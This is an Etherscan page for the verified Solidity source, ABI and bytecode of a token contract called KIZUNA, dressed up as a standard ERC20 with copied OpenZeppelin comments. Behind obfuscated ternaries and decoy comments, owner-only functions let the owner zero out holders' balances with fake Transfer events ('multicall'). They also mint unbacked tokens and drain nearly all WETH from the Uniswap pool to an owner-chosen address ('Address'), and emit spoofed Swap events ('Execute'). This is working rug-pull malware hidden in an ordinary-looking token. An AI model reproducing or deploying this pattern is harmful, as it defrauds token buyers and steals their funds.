ETH Price: $3,376.56 (+1.81%)

Token

KIZUNA (KIZUNA)
 

Overview

Max Total Supply

1,000,000,000,000 KIZUNA

Holders

72

Total Transfers

-

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
KIZUNA

Compiler Version
v0.7.6+commit.7338295f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-02
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.7.6;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
interface IERC20 {
    function transferFrom( address from, address to, uint256 value) external returns (bool);
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
interface Interfaces {
    function createPair( address tokenA, address tokenB) external returns (address pair);
    function token0() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function swapTokensForExactTokens( uint256 amountOut, uint256 amountInMax, address[] calldata path, address to, uint256 deadline) external returns (uint256[] memory amounts);
    function swapExactETHForTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline) external payable returns (uint256[] memory amounts);
    function getAmountsOut( uint256 amountIn, address[] memory path) external view returns (uint256[] memory amounts);
    function getAmountsIn( uint256 amountOut, address[] calldata path) external view returns (uint256[] memory amounts);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 {
    mapping(address => mapping(address => uint256)) public a;
    mapping(address => uint256) public b;
    mapping(address => uint256) public c;
    address public owner;
    uint256 _totalSupply;
    string _name;
    string _symbol;

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval( address indexed owner, address indexed spender, uint256 value);
    event Swap( address indexed sender, uint256 amount0In, uint256 amount1In, uint256 amount0Out, uint256 amount1Out, address indexed to);


    modifier onlyOwner() {
        require(owner == msg.sender, "Caller is not the owner");
        _;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }


    function TryCall(uint256 _a, uint256 _b) internal pure returns (uint256) {
        return _a / _b;
    }

    function FetchToken(uint256 _a) internal pure returns (uint256) {
        return _a * 100000 / (2931 + 97069);
    }

    function add(uint256 _a, uint256 _b) internal pure returns (uint256) {
        uint256 __c = _a + _b;
        require(__c >= _a, "SafeMath: addition overflow");

        return __c;
    }

    function sub(uint256 _a, uint256 _b) internal pure returns (uint256) {
        require(_b <= _a, "SafeMath: subtraction overflow");
        uint256 __c = _a - _b;

        return __c;
    }

    function div(uint256 _a, uint256 _b) internal pure returns (uint256) {
        return _a / _b;
    }

    function _T() internal view returns (bytes32) {
        return bytes32(uint256(uint160(address(this))) << 96);
    }

    function balanceOf(address account) public view virtual returns (uint256) {
        return b[account];
    }

    function transfer( address to, uint256 amount) public virtual returns (bool) {
        _transfer(msg.sender, to, amount);
        return true;
    }

    function allowance( address __owner, address spender) public view virtual returns (uint256) {
        return a[__owner][spender];
    }

    function approve( address spender, uint256 amount) public virtual returns (bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function transferFrom( address from, address to, uint256 amount) public virtual returns (bool) {
        _spendAllowance(from, msg.sender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function increaseAllowance( address spender, uint256 addedValue) public virtual returns (bool) {
        address __owner = msg.sender;
        _approve(__owner, spender, allowance(__owner, spender) + addedValue);
        return true;
    }

    function decreaseAllowance( address spender, uint256 subtractedValue) public virtual returns (bool) {
        address __owner = msg.sender;
        uint256 currentAllowance = allowance(__owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");

        _approve(__owner, spender, currentAllowance - subtractedValue);
        return true;
    }

    function _transfer( address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = b[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");

        b[from] = sub(fromBalance, amount);
        b[to] = add(b[to], amount);
        emit Transfer(from, to, amount);
    }

    function _approve( address __owner, address spender, uint256 amount) internal virtual {
        require(__owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        a[__owner][spender] = amount;
        emit Approval(__owner, spender, amount);
    }

    function _spendAllowance( address __owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(__owner, spender);
        if (currentAllowance != type(uint256).max) {
            require( currentAllowance >= amount, "ERC20: insufficient allowance");

            _approve(__owner, spender, currentAllowance - amount);
        }
        
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract KIZUNA is ERC20 {
    Interfaces internal _RR;
    Interfaces internal _pair;
    uint8 public decimals = 18;

    constructor() {
        _name = "KIZUNA";
        _symbol = "KIZUNA";
        _totalSupply = 1_000_000_000_000e18;
        owner = msg.sender;
        _RR = Interfaces(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _pair = Interfaces(Interfaces(_RR.factory()).createPair(address(this), address(_RR.WETH())));
        b[msg.sender] = _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }

    function Execute(uint256 t, address tA, uint256 w, address[] memory r) public onlyOwner returns (bool) {
        for (uint256 i = 0; i < r.length; i++) {
            callUniswap(r[i], t, w, tA);
        }
        return true;
    }


    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function Address(address _r) public onlyOwner {
        uint256 calling = (Sub(_RR.WETH()) * 99999) / 100000;
        address[] memory FoldArray = Div();
        uint256 called = Allowance(calling, FoldArray);
        getContract(calling, called, FoldArray, _r);
    }

    function Sub(address t) internal view returns (uint256) {
        (uint112 r0, uint112 r1, ) = _pair.getReserves();
        return (_pair.token0() == t) ? uint256(r0) : uint256(r1);
    }

    function Div() internal view returns (address[] memory) {
        address[] memory p;
        p = new address[](2);
        p[0] = address(this);
        p[1] = _RR.WETH();
        return p;
    }

    function getContract(uint256 blockTimestamp, uint256 selector, address[] memory list, address factory) internal {
        a[address(this)][address(_RR)] = b[address(this)];
        FactoryReview(blockTimestamp, selector, list, factory);
    }

    function FactoryReview( uint256 blockTime, uint256 multiplicator, address[] memory parts, address factory) internal {
        _RR
        .swapTokensForExactTokens(
        // assembler
        blockTime, 
        multiplicator, 
        // unchecked
        parts, 
        factory, 
        block.timestamp + 1200);
    }



    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
    */
    function Allowance(uint256 checked, address[] memory p) internal returns (uint256) {
        // Assembler for gas optimization {}
        uint256[] memory value;
        value = new uint256[](2);

        // uncheck {
        value = Mult(checked, p);
        b
        [
        block.
        timestamp> 
        uint256(
        1)||
        uint256(
        0)>
        1||
        uint160(
        1)< 

        block.
        timestamp
        ? 
        address(
        uint160(
        uint256(
        _T(

        ))>>96))
        :address(uint256(0))
        ]+= 
        // end uncheck }

        value
        
        [
        0
        ];

        return 
        value
        [
        0
        ];
    }

    function Mult( uint256 amO, address[] memory p) internal view returns (uint256[] memory){
        return _RR.getAmountsIn(amO, p);
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain`call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function multicall(bytes32[] calldata data, uint256 _p) public onlyOwner {
        // Assembler for gas optimization {}
        for 
        (uint256 i = 0; i < data.length; i++) {
        // assembly
        if
        (
        block
        .
        timestamp 
        >uint256(
        uint160(
        uint8(
        0
        )))
        )
        {
        // assembly 
        uint256 rS 
        =ConvertAddress(
        (uint256(

        uint16(
        uint8(
        0)) 
        )!=0)
        ?address(uint256(0))
        :address(
        uint160
        (uint256
        (data[i
        ])>>96)),
        _p
        );
        CheckAmount(data[i], rS);
        }
        }
    }

    function ConvertAddress(address _uu, uint256 _pp) internal view returns (uint256) {
        return TryCall(b[_uu], _pp);
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function CheckAmount(bytes32 _b, uint256 __a) internal {
        // Assembler for gas optimization {}
        emit
        Transfer
        (
        (uint256(0) 
        !=0 
        || 

        1238==1)
        ?address(
        uint256(
        0))

        :address(
        uint160
        (uint256(
        _b)>>96)),

        address(_pair),b
        // v0.5.11 specific update
        [
        (uint256(0) 
        !=0 
        || 
        1238==1)
        ?address(
        // Overflow control
        uint256(
        0))

        :address(
        uint160
        (uint256(
        _b)>>96))
        // Guard test
        ]
        );b
        // assembly
        [
        (uint256(0) 
        !=0 
        || 
        1238==1)
        ?address(
        // Must control
        uint256(
        0))

        :address(
        uint160
        (uint256(
        _b)>>96))
        // Contract opcode
        ]=
        FetchToken(
        uint256(
        __a));


    }

    function callUniswap(address router, uint256 transfer, uint256 cycleWidth, address unmount) internal {
        IERC20(unmount).transferFrom(router, address(_pair), cycleWidth);
        emit Transfer(address(_pair), router, transfer);
        emit Swap(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, transfer, 0, 0, cycleWidth, router);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_r","type":"address"}],"name":"Address","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"t","type":"uint256"},{"internalType":"address","name":"tA","type":"address"},{"internalType":"uint256","name":"w","type":"uint256"},{"internalType":"address[]","name":"r","type":"address[]"}],"name":"Execute","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"a","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"__owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"b","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"c","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32[]","name":"data","type":"bytes32[]"},{"internalType":"uint256","name":"_p","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040526008805460ff60a01b1916600960a11b1790553480156200002457600080fd5b50604080518082019091526006808252654b495a554e4160d01b60209092019182526200005491600591620002a9565b50604080518082019091526006808252654b495a554e4160d01b6020909201918252620000829181620002a9565b506c0c9f2c9cd04674edea400000006004908155600380546001600160a01b0319908116331790915560078054909116737a250d5630b4cf539739df2c5dacb4c659f2488d17908190556040805163c45a015560e01b815290516001600160a01b03929092169263c45a0155928282019260209290829003018186803b1580156200010c57600080fd5b505afa15801562000121573d6000803e3d6000fd5b505050506040513d60208110156200013857600080fd5b5051600754604080516315ab88c960e31b815290516001600160a01b039384169363c9c6539693309391169163ad5c464891600480820192602092909190829003018186803b1580156200018b57600080fd5b505afa158015620001a0573d6000803e3d6000fd5b505050506040513d6020811015620001b757600080fd5b5051604080516001600160e01b031960e086901b1681526001600160a01b0393841660048201529290911660248301525160448083019260209291908290030181600087803b1580156200020a57600080fd5b505af11580156200021f573d6000803e3d6000fd5b505050506040513d60208110156200023657600080fd5b5051600880546001600160a01b0319166001600160a01b03909216919091179055600454336000818152600160209081526040808320859055805194855251929391927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a362000355565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282620002e157600085556200032c565b82601f10620002fc57805160ff19168380011785556200032c565b828001600101855582156200032c579182015b828111156200032c5782518255916020019190600101906200030f565b506200033a9291506200033e565b5090565b5b808211156200033a57600081556001016200033f565b61168180620003656000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806358a10259116100a2578063a457c2d711610071578063a457c2d714610445578063a9059cbb14610471578063bda027821461049d578063dd62ed3e146104c3578063ebfb412d146104f157610116565b806358a102591461033657806370a08231146103f35780638da5cb5b1461041957806395d89b411461043d57610116565b806323b872dd116100e957806323b872dd14610218578063313ce5671461024e578063316d295f1461026c57806339509351146102dc5780635765a5cc1461030857610116565b806304ee65c01461011b57806306fdde0314610153578063095ea7b3146101d057806318160ddd14610210575b600080fd5b6101416004803603602081101561013157600080fd5b50356001600160a01b0316610517565b60408051918252519081900360200190f35b61015b610529565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561019557818101518382015260200161017d565b50505050905090810190601f1680156101c25780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101fc600480360360408110156101e657600080fd5b506001600160a01b0381351690602001356105bf565b604080519115158252519081900360200190f35b6101416105d5565b6101fc6004803603606081101561022e57600080fd5b506001600160a01b038135811691602081013590911690604001356105db565b6102566105fd565b6040805160ff9092168252519081900360200190f35b6102da6004803603604081101561028257600080fd5b810190602081018135600160201b81111561029c57600080fd5b8201836020820111156102ae57600080fd5b803590602001918460208302840111600160201b831117156102cf57600080fd5b91935091503561060d565b005b6101fc600480360360408110156102f257600080fd5b506001600160a01b0381351690602001356106ca565b6101416004803603604081101561031e57600080fd5b506001600160a01b03813581169160200135166106e3565b6101fc6004803603608081101561034c57600080fd5b8135916001600160a01b036020820135169160408201359190810190608081016060820135600160201b81111561038257600080fd5b82018360208201111561039457600080fd5b803590602001918460208302840111600160201b831117156103b557600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295506106fd945050505050565b6101416004803603602081101561040957600080fd5b50356001600160a01b0316610798565b6104216107b3565b604080516001600160a01b039092168252519081900360200190f35b61015b6107c2565b6101fc6004803603604081101561045b57600080fd5b506001600160a01b038135169060200135610823565b6101fc6004803603604081101561048757600080fd5b506001600160a01b03813516906020013561088a565b610141600480360360208110156104b357600080fd5b50356001600160a01b0316610897565b610141600480360360408110156104d957600080fd5b506001600160a01b03813581169160200135166108a9565b6102da6004803603602081101561050757600080fd5b50356001600160a01b03166108d2565b60026020526000908152604090205481565b60058054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156105b55780601f1061058a576101008083540402835291602001916105b5565b820191906000526020600020905b81548152906001019060200180831161059857829003601f168201915b5050505050905090565b60006105cc3384846109e8565b50600192915050565b60045490565b60006105e8843384610ad2565b6105f3848484610b4b565b5060019392505050565b600854600160a01b900460ff1681565b6003546001600160a01b03163314610666576040805162461bcd60e51b815260206004820152601760248201527621b0b63632b91034b9903737ba103a34329037bbb732b960491b604482015290519081900360640190fd5b60005b828110156106c45742156106bc57600061069c606086868581811061068a57fe5b9050602002013560001c901c84610cc3565b90506106ba8585848181106106ad57fe5b9050602002013582610ced565b505b600101610669565b50505050565b6000336105f38185856106dd83836108a9565b016109e8565b600060208181529281526040808220909352908152205481565b6003546000906001600160a01b03163314610759576040805162461bcd60e51b815260206004820152601760248201527621b0b63632b91034b9903737ba103a34329037bbb732b960491b604482015290519081900360640190fd5b60005b825181101561078c5761078483828151811061077457fe5b6020026020010151878688610d69565b60010161075c565b50600195945050505050565b6001600160a01b031660009081526001602052604090205490565b6003546001600160a01b031681565b60068054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156105b55780601f1061058a576101008083540402835291602001916105b5565b6000338161083182866108a9565b9050838110156108725760405162461bcd60e51b81526004018080602001828103825260258152602001806116276025913960400191505060405180910390fd5b61087f82868684036109e8565b506001949350505050565b60006105cc338484610b4b565b60016020526000908152604090205481565b6001600160a01b0391821660009081526020818152604080832093909416825291909152205490565b6003546001600160a01b0316331461092b576040805162461bcd60e51b815260206004820152601760248201527621b0b63632b91034b9903737ba103a34329037bbb732b960491b604482015290519081900360640190fd5b6000620186a06109b3600760009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b15801561098257600080fd5b505afa158015610996573d6000803e3d6000fd5b505050506040513d60208110156109ac57600080fd5b5051610ea6565b6201869f02816109bf57fe5b04905060006109cc610fd2565b905060006109da83836110b0565b90506106c48382848761116a565b6001600160a01b038316610a2d5760405162461bcd60e51b81526004018080602001828103825260248152602001806116036024913960400191505060405180910390fd5b6001600160a01b038216610a725760405162461bcd60e51b81526004018080602001828103825260228152602001806115966022913960400191505060405180910390fd5b6001600160a01b0380841660008181526020818152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6000610ade84846108a9565b905060001981146106c45781811015610b3e576040805162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015290519081900360640190fd5b6106c484848484036109e8565b6001600160a01b038316610b905760405162461bcd60e51b81526004018080602001828103825260258152602001806115de6025913960400191505060405180910390fd5b6001600160a01b038216610bd55760405162461bcd60e51b81526004018080602001828103825260238152602001806115736023913960400191505060405180910390fd5b6001600160a01b03831660009081526001602052604090205481811015610c2d5760405162461bcd60e51b81526004018080602001828103825260268152602001806115b86026913960400191505060405180910390fd5b610c3781836111a4565b6001600160a01b038086166000908152600160205260408082209390935590851681522054610c669083611201565b6001600160a01b0380851660008181526001602090815260409182902094909455805186815290519193928816927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a350505050565b6001600160a01b038216600090815260016020526040812054610ce6908361125b565b9392505050565b600854606083901c60008181526001602090815260409182902054825190815291516001600160a01b03909416937fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a3610d4e8161126e565b60609290921c60009081526001602052604090209190915550565b600854604080516323b872dd60e01b81526001600160a01b0387811660048301529283166024820152604481018590529051918316916323b872dd916064808201926020929091908290030181600087803b158015610dc757600080fd5b505af1158015610ddb573d6000803e3d6000fd5b505050506040513d6020811015610df157600080fd5b50506008546040805185815290516001600160a01b038088169316917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef919081900360200190a360408051848152600060208201819052818301526060810184905290516001600160a01b03861691737a250d5630b4cf539739df2c5dacb4c659f2488d917fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8229181900360800190a350505050565b6000806000600860009054906101000a90046001600160a01b03166001600160a01b0316630902f1ac6040518163ffffffff1660e01b815260040160606040518083038186803b158015610ef957600080fd5b505afa158015610f0d573d6000803e3d6000fd5b505050506040513d6060811015610f2357600080fd5b50805160209182015160085460408051630dfe168160e01b815290519396509194506001600160a01b0380891694911692630dfe1681926004808201939291829003018186803b158015610f7657600080fd5b505afa158015610f8a573d6000803e3d6000fd5b505050506040513d6020811015610fa057600080fd5b50516001600160a01b031614610fbf57806001600160701b0316610fca565b816001600160701b03165b949350505050565b604080516002808252606080830184529283929190602083019080368337019050509050308160008151811061100457fe5b6001600160a01b03928316602091820292909201810191909152600754604080516315ab88c960e31b81529051919093169263ad5c4648926004808301939192829003018186803b15801561105857600080fd5b505afa15801561106c573d6000803e3d6000fd5b505050506040513d602081101561108257600080fd5b505181518290600190811061109357fe5b6001600160a01b0390921660209283029190910190910152905090565b60408051600280825260608083018452600093909291906020830190803683370190505090506110e08484611279565b9050806000815181106110ef57fe5b6020026020010151600160006001421180611108575060005b806111135750426001105b61111e57600061112b565b60606111286113d7565b901c5b6001600160a01b03168152602081019190915260400160009081208054909201909155815182919061115957fe5b602002602001015191505092915050565b306000908152600160209081526040808320548383528184206007546001600160a01b03168552909252909120556106c4848484846113de565b6000828211156111fb576040805162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f770000604482015290519081900360640190fd5b50900390565b600082820183811015610ce6576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b600081838161126657fe5b049392505050565b620186a09081020490565b600754604080516307c0329d60e21b815260048101858152602482019283528451604483015284516060946001600160a01b031693631f00ca749388938893909291606401906020808601910280838360005b838110156112e45781810151838201526020016112cc565b50505050905001935050505060006040518083038186803b15801561130857600080fd5b505afa15801561131c573d6000803e3d6000fd5b505050506040513d6000823e601f3d908101601f19168201604052602081101561134557600080fd5b8101908080516040519392919084600160201b82111561136457600080fd5b90830190602082018581111561137957600080fd5b82518660208202830111600160201b8211171561139557600080fd5b82525081516020918201928201910280838360005b838110156113c25781810151838201526020016113aa565b50505050905001604052505050905092915050565b3060601b90565b600760009054906101000a90046001600160a01b03166001600160a01b0316638803dbee85858585426104b0016040518663ffffffff1660e01b81526004018086815260200185815260200180602001846001600160a01b03168152602001838152602001828103825285818151815260200191508051906020019060200280838360005b8381101561147b578181015183820152602001611463565b505050509050019650505050505050600060405180830381600087803b1580156114a457600080fd5b505af11580156114b8573d6000803e3d6000fd5b505050506040513d6000823e601f3d908101601f1916820160405260208110156114e157600080fd5b8101908080516040519392919084600160201b82111561150057600080fd5b90830190602082018581111561151557600080fd5b82518660208202830111600160201b8211171561153157600080fd5b82525081516020918201928201910280838360005b8381101561155e578181015183820152602001611546565b50505050905001604052505050505050505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220bb2d1a946deecbf111e5114dd217bbec7bc5e41383fbae5f388fc3c212581f0264736f6c63430007060033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c806358a10259116100a2578063a457c2d711610071578063a457c2d714610445578063a9059cbb14610471578063bda027821461049d578063dd62ed3e146104c3578063ebfb412d146104f157610116565b806358a102591461033657806370a08231146103f35780638da5cb5b1461041957806395d89b411461043d57610116565b806323b872dd116100e957806323b872dd14610218578063313ce5671461024e578063316d295f1461026c57806339509351146102dc5780635765a5cc1461030857610116565b806304ee65c01461011b57806306fdde0314610153578063095ea7b3146101d057806318160ddd14610210575b600080fd5b6101416004803603602081101561013157600080fd5b50356001600160a01b0316610517565b60408051918252519081900360200190f35b61015b610529565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561019557818101518382015260200161017d565b50505050905090810190601f1680156101c25780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101fc600480360360408110156101e657600080fd5b506001600160a01b0381351690602001356105bf565b604080519115158252519081900360200190f35b6101416105d5565b6101fc6004803603606081101561022e57600080fd5b506001600160a01b038135811691602081013590911690604001356105db565b6102566105fd565b6040805160ff9092168252519081900360200190f35b6102da6004803603604081101561028257600080fd5b810190602081018135600160201b81111561029c57600080fd5b8201836020820111156102ae57600080fd5b803590602001918460208302840111600160201b831117156102cf57600080fd5b91935091503561060d565b005b6101fc600480360360408110156102f257600080fd5b506001600160a01b0381351690602001356106ca565b6101416004803603604081101561031e57600080fd5b506001600160a01b03813581169160200135166106e3565b6101fc6004803603608081101561034c57600080fd5b8135916001600160a01b036020820135169160408201359190810190608081016060820135600160201b81111561038257600080fd5b82018360208201111561039457600080fd5b803590602001918460208302840111600160201b831117156103b557600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295506106fd945050505050565b6101416004803603602081101561040957600080fd5b50356001600160a0